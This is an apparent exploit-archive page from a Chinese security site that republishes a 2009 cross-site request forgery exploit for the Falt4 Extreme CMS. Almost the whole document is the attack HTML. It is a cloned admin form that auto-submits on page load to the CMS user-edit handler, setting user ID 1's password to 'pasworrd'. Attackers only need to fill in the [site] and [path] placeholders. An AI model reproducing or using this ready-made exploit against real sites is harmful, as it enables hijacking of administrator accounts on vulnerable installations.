首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Falt4 Extreme RC4,10.9.2007 CMS cross site request forgery exploit
来源:d14l.123[at]hotmail.com 作者:d14l 发布时间:2009-02-16   
#######################################
#
#falt4 extreme (RC4,10.9.2007) cms cross site request forgery
########################################
#
#Authors:d14l and marcoj
#######################################
#
#cms homepage:www.falt4.org
#######################################
#greetz:soul,stefo,sp1r1t,stexor,stronix,invisible,kisobran,csi and others
#
########################################

falt4 cms suffers from csrf vulnerability which allows attacket to change victim's password



you need only edit [site] and [path] in code and when victim click on it it will change its password to "pasworrd"

id of admin is "1"

######################################################CODE##########################################################		
	</head>

	<body>
	

<body onload="javascript:senden()">
<div id='content_container'>
	<table width='1000' align='center' cellpadding='0' cellspacing='0' border='0' bgcolor='white'>
		<!-- header -->
		<tr>
			<td height='54'>
					<div id="helpbutton"><a href='javascript:helpflap();'><img src='gfx/themes/default_blue//help.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></div>

					<div id='helptext'></div>

				<div class='logo' align="left" style='padding:0px;z-index:5;position:relative;'>
					<table width='100%' cellpadding='15' cellpadding="5">
					<tr>
						<td width='50%' align='left'>
						<img src='gfx/themes/default_blue/banners/banner.jpg' alt='faltsystem' />						<div style='position:absolute;top:65px;margin-left:70px;' id='quotes'></div>
						</td>
						<td width='50%' align='right'  style='position:relative;z-index:6;'>

												<div style='position:relative;z-index:0;'>
						<table>
							<tr>
								<td valign='middle'>
									<img src='gfx/themes/default_blue/quickfind.gif' alt='' />
								</td>
								<td valign="middle">
									<input input type="text" class="inputfield" class="inputfield" name="query" id="query" onKeyup="sendit();">
								</td>

							</tr>
						</table>
						</div>

							

<!-- SPOTLIGHT HERE -->
						</td>
					</tr>
					</table>


				</div>
			</td>
		</tr>
		<!-- banner -->
		<!-- nav -->
		<tr>
			<td>
				<table width='100%' cellpadding='0' cellspacing='0' border='0'>
					<tr>

						<td height='23' width="100%" style="position:relative;z-index:9;" align="right">
							<div id="menu">
<ul id="nav">

	<li><a class='nav_inactive' href="index.php?handler=start"><img src='gfx/themes/default_blue/menu_icons/application_home.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Start</a></li>


<!-- ARTIKEL -->
	<li><a class='nav_inactive' href="index.php?handler=edit_content&action=list_articles"><img src='gfx/themes/default_blue/menu_icons/icon_article.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Article</a></li> 
<!-- MEDIADB -->
	<li><a class='nav_inactive' href="index.php?handler=mediadb25"><img src='gfx/themes/default_blue/menu_icons/mdb-mini.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Media DB</a></li>

<!-- SEITENSTRUKTUR -->

	<li><a class='nav_inactive' href="index.php?handler=edit_site_structure"><img src='gfx/themes/default_blue/menu_icons/treeview.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Structure</a></li>


<!-- KATEGORIEN -->


	<li><a class='nav_inactive' href="index.php?handler=edit_categories&action=default"><img src='gfx/themes/default_blue/menu_icons/minicategorie_normal.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Categories        </a> 
			</li>


<!-- NAVIGATION -->
	<li><a class='nav_inactive' href='index.php?handler=edit_navigation&action=default'><img src='gfx/themes/default_blue/menu_icons/navigation.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Navigation</a></li>

<!-- MODULE -->

	<li><a class='nav_inactive' href='index.php?handler=edit_modules&action=default'><img src='gfx/themes/default_blue/menu_icons/icon_module.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Module</a></li>
	



	<li><a class='nav_active' href='index.php?handler=edit_properties&action=default'><img src='gfx/themes/default_blue/menu_icons/site_properties.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Administration</a>
</li>
	<li><a class='nav_inactive' href='index.php?handler=show_statistics&action=default'><img src='gfx/themes/default_blue/menu_icons/statistics.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Statistics</a></li>

</ul>


</div>
						</td>
					</tr>
				</table>
			</td>
		</tr>

		<!--engine-->

		<tr>
			<td class='border_top' height='440' bgcolor='white' valign='top'>
				<table width='100%' cellpadding='0' cellspacing='0' border='0'>
					<tr>
						<td width='160' valign='top'>
							<!-- aktionen -->
							<table width='160' cellpadding='0' cellspacing='0' border='0'>
								<!--spacer ueber aktionen -->
								<tr>

									<td width='160' height='5' valign="top">
									</td>
								</tr>
								<tr>
									<td width='160' height='272' valign="top">
									<table width='160' class='nav_left' style='border-spacing: 0px 8px;'>		<tr>
								<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=default'><img src='gfx/themes/default_blue/menu_icons/list.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
								<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=default'>Listview</a></td>		</tr>		<tr>

								<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=add_choose'><img src='gfx/themes/default_blue/menu_icons/user_add.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
								<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=add_choose'>Add User</a></td>		</tr>		<tr>
								<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=addgroup_choose'><img src='gfx/themes/default_blue/menu_icons/group_add.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
								<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=addgroup_choose'>Add Group</a></td>		</tr><tr><td colspan='2' class='nav_no'>&nbsp;</td></tr>		<tr>
								<td valign='middle' width='32' height='25' class='action_group' align='right'><img src='gfx/themes/default_blue/menu_icons/icon_action.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</td>
								<td width='140' align='left' style='padding-left:0px;' class='action_group' valign='middle'><b> Process</b></td>		</tr>		<tr>

									<td valign='top' width='32' height='15' align='right'><a onClick='javascript:senden()'><img src='gfx/themes/default_blue/menu_icons/save.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
									<td valign='top' width='140' align='left' class='actions'><a onClick='javascript:senden()'> Save</a></td>		</tr>		<tr>
									<td valign='top' width='32' height='15' align='right'><a onClick='javascript:history.back()'><img src='gfx/themes/default_blue/menu_icons/back.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
									<td valign='top' width='140' align='left' class='actions'><a onClick='javascript:history.back()'> Back</a></td>		</tr></table>
									</td>

								</tr>
								<tr>
									<td width='160' height='172' valign="bottom">
											<table width='160' cellpadding='0' cellspacing='0' border='0'>
											<tr>
											<td width='140' align='left' style='padding-left:0px;' class='action_group' valign='middle'><img src='gfx/themes/default_blue/spacer1x1.gif' width='16' height='16' alt='&gt;' /><strong>Logged in as&nbsp; </strong></td>
											</td>
											</tr>

											<tr><td>
											<p style="padding-top:8px;">&nbsp;&nbsp;<img src='gfx/themes/default_blue/menu_icons/logout.png' alt='&gt;' />&nbsp;<a href='index.php?submit=logout' style='color:#FF6600; font-weight:normal;'><strong>[Logout]</strong></a><p/>
											<p>&nbsp;&nbsp;<img src='gfx/themes/default_blue/menu_icons/site_properties.png' alt='&gt;' />&nbsp;<a href="index.php?handler=dummy">My Profile</a></p>
											<p>&nbsp;&nbsp;<select name='backlang'  onchange="window.location='http://[site]/[path]/admin/index.php?handler=manage_users&action=edit&ID=1&backlang='+this.options [this.selectedIndex].value"><option value='de' >de</option><option value='En'  selected>En</option><option value='es' >es</option><option value='fr' >fr</option><option value='it' >it</option><option value='leet' >leet</option></select></p>		<script language="JavaScript">
		function reload_theme()
		{
			var url = String(window.location);
			var url = url.replace(/#/g,"");
			alert(url);
		}
		</script>	
	
	<p>&nbsp;&nbsp;<select name='backtheme' onchange="window.location='index.php?handler=manage_users&action=edit&ID=1&back_theme='+this.options [this.selectedIndex].value"><option value='default'  selected>default</option><option value='default_blue'  selected>default_blue</option></select></p>											</td></tr>

											</table>
									</td>
								</tr>
							</table>
						</td>
						<td bgcolor="#e3e3e4" height='440'>
								<!-- enginebox -->
								<table width='100%' cellpadding='0' cellspacing='0' border='0'>
								<tr>

									<td width='20' height='40' valign="top">
									</td>
									<td>
										<div style="position:relative; top:0px; right:13px; text-align:right; font-size:16px; font-weight:bold; color:#999999;z-index:2;"></div>
									</td>
								</tr>
								<tr>
									<td width='20' height='40' valign="top">
									</td>

									<td valign='top' height='900' style="position:relative;z-index:2;">
									

									<div id="response_div" name="response_div"></div>
										
<script language="JavaScript" type="text/javascript">
function senden()
{
	var check = chkFormular();
	if(check!=false)
	{
		document.formular.submit();	
	}	
}
function chkFormular()
{

  
  if(document.formular.password.value=="")
  {
   alert('Enter a user password');
   document.formular.password.focus();
   return false;
  }
 
  
 }
</script>
<form action="http://[site]/[path]/admin/index.php?handler=manage_users&action=edit_now" name="formular" method="post"><table width='825' id='table_open_1'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>Account information</td></tr><tr><td class='white'><table width='100%' cellpadding='2' cellspacing='1'><tr class="title"><td colspan='2'>User properties from<i>   </i>change</td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Name:</b></td><td> </td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Password:</td><td><input input type="password" class="inputfield" class="inputfield" name="password" value="pasworrd"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Status:</td><td>Administrator</td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>eMail:</td><td><input input type="text" class="inputfield" class="inputfield" name="email" value="ssssssssssssssss@net.hr"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>ICQ:</td><td><input input type="text" class="inputfield" class="inputfield" name="icq" value="0"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Picture:</td><td>	<script type="text/javascript">		
		function selectdiv()
		{
		  if (document.getElementById) 
		  {
		    var mydiv=document.getElementById('selectdiv');
		    mydiv.style.display = (mydiv.style.display=='block'?'none':'block');	   		    	    
		  }
		}
	</script>

	
	<input type='hidden' size='30' name='kat_ID' id='kat_ID_hidden'><table cellpadding='0' cellspacing='0'><tr><td><input type='text' class='inputfield' size='25' name='katname' id='katname' onclick='selectdiv(); this.blur();'></td><td><a onClick='selectdiv();'><img src='gfx/themes/default_blue/chooser.gif' style='cursor:pointer'></a></td></tr></table><div id='selectdiv' class='selectdiv' onClick='selectdiv();'>
<table border='0' cellpadding='0' cellspacing='0'>
	<tr><td width='19' valign='top' style='cursor:pointer;'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=1; document.forms[0].katname.value='/ Root'; show_kat_1();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=1; document.forms[0].katname.value='/ Root'; show_kat_1();">/ Root(0)</netcms><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=5; document.forms[0].katname.value='business'; show_kat_5();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=5; document.forms[0].katname.value='business'; show_kat_5();">business(3)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=6; document.forms[0].katname.value='business.tar'; show_kat_6();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=6; document.forms[0].katname.value='business.tar'; show_kat_6();">business.tar(0)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=7; document.forms[0].katname.value='business.tar'; show_kat_7();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=7; document.forms[0].katname.value='business.tar'; show_kat_7();">business.tar(3)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=4; document.forms[0].katname.value='screenshots'; show_kat_4();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=4; document.forms[0].katname.value='screenshots'; show_kat_4();">screenshots(8)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=2; document.forms[0].katname.value='Templates'; show_kat_2();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=2; document.forms[0].katname.value='Templates'; show_kat_2();">Templates(0)</a><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=3; document.forms[0].katname.value='Falt4 Extreme'; show_kat_3();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=3; document.forms[0].katname.value='Falt4 Extreme'; show_kat_3();">Falt4 Extreme(7)</a></td></tr></table></td></tr></table></td></tr>

</table></div>	<script type="text/javascript">		

		function selectmediadiv()
		{
		  if (document.getElementById) 
		  {
		    var mydiv=document.getElementById('selectmediadiv');
		    mydiv.style.display = (mydiv.style.display=='block'?'none':'block');	   		    	    
		  }
		}
	</script>
	<input type='hidden' size='30' name='avatar' id='media_ID' value=''><table cellpadding='0' cellspacing='0'><tr><td><input type='text' class='inputfield' size='25' value='' name='medianame' id='medianame' onClick='selectmediadiv(); this.blur();'></td><td style='cursor:pointer;'><a onClick='selectmediadiv();' style='cursor:pointer;'><img style='cursor:pointer;' src='gfx/themes/default_blue/chooser.gif'></a></td></tr></table><div id='selectmediadiv' class='selectdiv' onClick='selectmediadiv();'></div><table width='153'><script language='javascript'>
var mediadiv = document.getElementById('selectmediadiv');
function show_kat_1(){
		mediadiv.innerHTML='';
 check(); } 
function show_kat_2(){
		mediadiv.innerHTML='';
 check(); } 
function show_kat_3(){
		mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'apfel.jpg\'; document.forms[0].media_ID.value = \'1\';"  width="153"><a onClick="document.forms[0].medianame.value =\'apfel.jpg\'; document.forms[0].media_ID.value =\'1\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'apfel.jpg\'; document.forms[0].media_ID.value =\'1\';" ><netcms class="mediafont">apfel.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'home.gif\'; document.forms[0].media_ID.value = \'2\';"  width="153"><a onClick="document.forms[0].medianame.value =\'home.gif\'; document.forms[0].media_ID.value =\'2\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'home.gif\'; document.forms[0].media_ID.value =\'2\';" ><netcms class="mediafont">home.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'map\'; document.forms[0].media_ID.value = \'7\';"  width="153"><a onClick="document.forms[0].medianame.value =\'map\'; document.forms[0].media_ID.value =\'7\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'map\'; document.forms[0].media_ID.value =\'7\';" ><netcms class="mediafont">map</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'modules.gif\'; document.forms[0].media_ID.value = \'3\';"  width="153"><a onClick="document.forms[0].medianame.value =\'modules.gif\'; document.forms[0].media_ID.value =\'3\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'modules.gif\'; document.forms[0].media_ID.value =\'3\';" ><netcms class="mediafont">modules.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'pictures.gif\'; document.forms[0].media_ID.value = \'4\';"  width="153"><a onClick="document.forms[0].medianame.value =\'pictures.gif\'; document.forms[0].media_ID.value =\'4\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'pictures.gif\'; document.forms[0].media_ID.value =\'4\';" ><netcms class="mediafont">pictures.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'speedmap.gif\'; document.forms[0].media_ID.value = \'5\';"  width="153"><a onClick="document.forms[0].medianame.value =\'speedmap.gif\'; document.forms[0].media_ID.value =\'5\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'speedmap.gif\'; document.forms[0].media_ID.value =\'5\';" ><netcms class="mediafont">speedmap.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'treasuremap.gif\'; document.forms[0].media_ID.value = \'6\';"  width="153"><a onClick="document.forms[0].medianame.value =\'treasuremap.gif\'; document.forms[0].media_ID.value =\'6\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'treasuremap.gif\'; document.forms[0].media_ID.value =\'6\';" ><netcms class="mediafont">treasuremap.gif</netcms></a><br/></td></tr>';
 check(); } 
function show_kat_4(){
		mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'Administrators Place\'; document.forms[0].media_ID.value = \'14\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Administrators Place\'; document.forms[0].media_ID.value =\'14\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Administrators Place\'; document.forms[0].media_ID.value =\'14\';" ><netcms class="mediafont">Administrators Place</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Article properties\'; document.forms[0].media_ID.value = \'10\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Article properties\'; document.forms[0].media_ID.value =\'10\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Article properties\'; document.forms[0].media_ID.value =\'10\';" ><netcms class="mediafont">Article properties</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Article editing\'; document.forms[0].media_ID.value = \'11\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Article editing\'; document.forms[0].media_ID.value =\'11\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Article editing\'; document.forms[0].media_ID.value =\'11\';" ><netcms class="mediafont">Falt4 Article editing</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Article listing\'; document.forms[0].media_ID.value = \'9\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Article listing\'; document.forms[0].media_ID.value =\'9\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Article listing\'; document.forms[0].media_ID.value =\'9\';" ><netcms class="mediafont">Falt4 Article listing</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Media Database\'; document.forms[0].media_ID.value = \'12\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Media Database\'; document.forms[0].media_ID.value =\'12\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Media Database\'; document.forms[0].media_ID.value =\'12\';" ><netcms class="mediafont">Falt4 Media Database</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Navigation Administration\'; document.forms[0].media_ID.value = \'1\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Navigation Administration\'; document.forms[0].media_ID.value =\'1\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Navigation Administration\'; document.forms[0].media_ID.value =\'1\';" ><netcms class="mediafont">Falt4 Navigation Administration</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Template editor\'; document.forms[0].media_ID.value = \'15\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Template editor\'; document.forms[0].media_ID.value =\'15\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Template editor\'; document.forms[0].media_ID.value =\'15\';" ><netcms class="mediafont">Falt4 Template editor</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Welcome Screen\'; document.forms[0].media_ID.value = \'8\';"  width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Welcome Screen\'; document.forms[0].media_ID.value =\'8\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Welcome Screen\'; document.forms[0].media_ID.value =\'8\';" ><netcms class="mediafont">Falt4 Welcome Screen</netcms></a><br/></td></tr>';
 check(); } 
function show_kat_5(){
		mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'1.jpg\'; document.forms[0].media_ID.value = \'16\';"  width="153"><a onClick="document.forms[0].medianame.value =\'1.jpg\'; document.forms[0].media_ID.value =\'16\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'1.jpg\'; document.forms[0].media_ID.value =\'16\';" ><netcms class="mediafont">1.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'2.jpg\'; document.forms[0].media_ID.value = \'17\';"  width="153"><a onClick="document.forms[0].medianame.value =\'2.jpg\'; document.forms[0].media_ID.value =\'17\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'2.jpg\'; document.forms[0].media_ID.value =\'17\';" ><netcms class="mediafont">2.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'3.jpg\'; document.forms[0].media_ID.value = \'18\';"  width="153"><a onClick="document.forms[0].medianame.value =\'3.jpg\'; document.forms[0].media_ID.value =\'18\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'3.jpg\'; document.forms[0].media_ID.value =\'18\';" ><netcms class="mediafont">3.jpg</netcms></a><br/></td></tr>';
 check(); } 
function show_kat_6(){
		mediadiv.innerHTML='';
 check(); } 
function show_kat_7(){
		mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'16\'; document.forms[0].media_ID.value = \'20\';"  width="153"><a onClick="document.forms[0].medianame.value =\'16\'; document.forms[0].media_ID.value =\'20\';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value =\'16\'; document.forms[0].media_ID.value =\'20\';" ><netcms class="mediafont">16</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'17\'; document.forms[0].media_ID.value = \'19\';"  width="153"><a onClick="document.forms[0].medianame.value =\'17\'; document.forms[0].media_ID.value =\'19\';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value =\'17\'; document.forms[0].media_ID.value =\'19\';" ><netcms class="mediafont">17</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'18\'; document.forms[0].media_ID.value = \'21\';"  width="153"><a onClick="document.forms[0].medianame.value =\'18\'; document.forms[0].media_ID.value =\'21\';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value =\'18\'; document.forms[0].media_ID.value =\'21\';" ><netcms class="mediafont">18</netcms></a><br/></td></tr>';
 check(); } 
function check(){ 
	if(document.forms[0].kat_ID_hidden.value != ''){
 document.forms[0].medianame.value = 'No Media Selected';
}}	if(document.forms[0].kat_ID.value == ''){
 document.forms[0].kat_ID.value = ''; document.forms[0].katname.value = ''; show_kat_(); document.forms[0].medianame.value = ''; document.forms[0].media_ID.value = '';
}	if(document.forms[0].medianame.value == ''){
 document.forms[0].medianame.value = 'No Media Selected';
}if(document.forms[0].katname.value == ''){document.forms[0].katname.value = 'No Kat Selected';}</script></table></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Signature:</td><td><input input type="text" class="inputfield" class="inputfield" name="signature" value=""></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>www:</td><td><input input type="text" class="inputfield" class="inputfield" name="www" value=""></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Default editor:</td><td><select name='editor'><option value="">-- Default --</option><option value='editor'>graphic editor (Word)</option><option value='html' >HTML editor</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Backend Language:</td><td><select name="backend_language"><option value="">-- Default --</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Sort by:</td><td><select name="sortfield"><option value="">-- Default --</option><option value="categorie">Category</option><option value="title">Title</option><option value="Datum">Date</option></select><select name="sort"><option value="">-- Default --</option><option value="desc">List descending(a-b-c)</option><option value="asc">List ascending (c-b-a)</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Genenral time information:</td><td><select name="timespan"><option value="">-- Default --</option><option value="1">1 Days</option><option value="2">2 Days</option><option value="3">3 Days</option><option value="4">4 Days</option><option value="5">5 Days</option><option value="6">6 Days</option><option value="7">7 Days</option><option value="8">8 Days</option><option value="9">9 Days</option><option value="10">10 Days</option><option value="11">11 Days</option><option value="12">12 Days</option><option value="13">13 Days</option><option value="14">14 Days</option><option value="15">15 Days</option><option value="16">16 Days</option><option value="17">17 Days</option><option value="18">18 Days</option><option value="19">19 Days</option><option value="20">20 Days</option><option value="21">21 Days</option><option value="22">22 Days</option><option value="23">23 Days</option><option value="24">24 Days</option><option value="25">25 Days</option><option value="26">26 Days</option><option value="27">27 Days</option><option value="28">28 Days</option><option value="29">29 Days</option><option value="30">30 Days</option><option value="31">31 Days</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Auto puplishing:</td><td><select name="publish_aut"><option value="1">Yes</option><option value="0"selected>No</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Messages recieved from CMS:</td><td><select name="send_mail"><option value="0" selected>No</option><option value="1" >Yes</option></select><select name="level"><option value="1" selected>1 | Only messages and duties</option><option value="2" >2 | Messages & duties & publishing requestions</option><option value="3" >3 | Article changes & duties & Messages & publishing requestions</option><option value="4" >4 | All</option></select></td></tr></table></td></tr></table><br /><br /><input type="hidden" name="ID" value="1"><table width='825' id='table_open_2'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>Security Settings</td></tr><tr><td class='white'><table width='100%' cellpadding='2' cellspacing='1'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Secure Login:</td><td colspan='2'><input type='radio' name='restricted_login' value='1' >Yes<input type='radio' name='restricted_login' value='0' checked>No</td></tr></form><form action='index.php?handler=manage_users&action=change_ip' method='post'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>existing IP- Adressen:</td><td><select name='ip[]' size='5' multiple></select></td><td><input type='submit' name='bb' value='Drop selection' style='cursor:pointer;'></td></tr><input type='hidden' name='user_ID' value='1'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td> add new IP-adress:</td><td><input type='text' class='inputfield' name='new_ip'></td><td><input type='submit' name='bb' value='add' style='cursor:pointer;'></td></tr></form></table></td></tr></table><br /><br /><table width='825' id='table_open_3'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>&nbsp;</td></tr><tr><td class='white'><table cellpadding="0" cellspacing="0"><tr><td  style="cursor:pointer;" class="button_background" onclick="javascript:senden()"><font color="#FFFFFF" style='text-decoration:none;'>Save</font></td></tr></table><br /><table cellpadding="0" cellspacing="0"><tr><td  style="cursor:pointer;" class="button_background" onclick="javascript:history.back()"><font color="#FFFFFF" style='text-decoration:none;'>Back</font></td></tr></table><br /></td></tr></table><br /><br />   
	
	
										<br><br>

									</td>
								</tr>

						</td>
					</tr>
				</table>
			</td>
		</tr>
	</table>

	</div>

	</body>
</html>


